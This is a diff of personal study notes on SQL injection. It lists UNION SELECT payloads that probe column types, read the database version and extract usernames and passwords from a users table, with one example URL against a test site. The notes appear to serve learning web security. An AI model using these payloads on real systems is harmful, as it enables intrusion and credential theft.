fathimakm/web_security_notes/sql_injection.md

 - to check if data type is same, `' UNION SELECT 'a', 'a'#` this checks if data type of 1st column is text , and 2nd column is also text.
-    `'UNION SELECT NULL,'a',NULL --` (to check if particular column has string, if 200 success, otherwise not string) (if the string a is not there in the column content, it adds it to the column and prints it along)
+    `'UNION SELECT NULL,'a',NULL --` (to check if particular column has string, if 200 success, otherwise not string) (if the string a is not there in the column content, it adds it to the column and prints it along , if done in browser)

 - to find version of database,
 `' UNION SELECT @@version, NULL# `  (null is added because there are 2 column)

+- to find username and password from table users `'+UNION+SELECT+username,+password+FROM+users--`

 `www.test.com/app.php?id=' UNION SELECT username, password FROM users--`
     we didn't give id so it's empty